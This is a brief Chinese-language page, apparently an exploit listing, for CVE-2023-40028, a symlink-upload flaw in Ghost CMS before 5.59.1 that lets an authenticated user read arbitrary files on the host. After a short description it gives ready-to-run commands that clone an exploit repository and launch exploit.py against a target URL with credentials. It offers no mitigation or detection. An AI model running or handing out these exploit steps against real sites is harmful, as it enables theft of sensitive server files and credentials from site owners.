Ghost CMS 符号链接上传漏洞导致任意文件读取
POC 图片
CVE-2023-40028 是 Ghost CMS 5.59.1 之前版本中的一个漏洞,认证用户可以上传符号链接(symlink),从而导致在主机系统上任意读取文件。攻击者可以利用 Ghost CMS 的上传功能放置指向敏感文件的符号链接来利用该漏洞。符号链接上传后,攻击者可以通过向服务器发送特制的 HTTP 请求来访问目标文件。
git clone https://github.com/rvizx/CVE-2023-40028
cd CVE-2023-40028
python3 exploit.py --url <http://target-ghost-cms> -u <username> -p <password>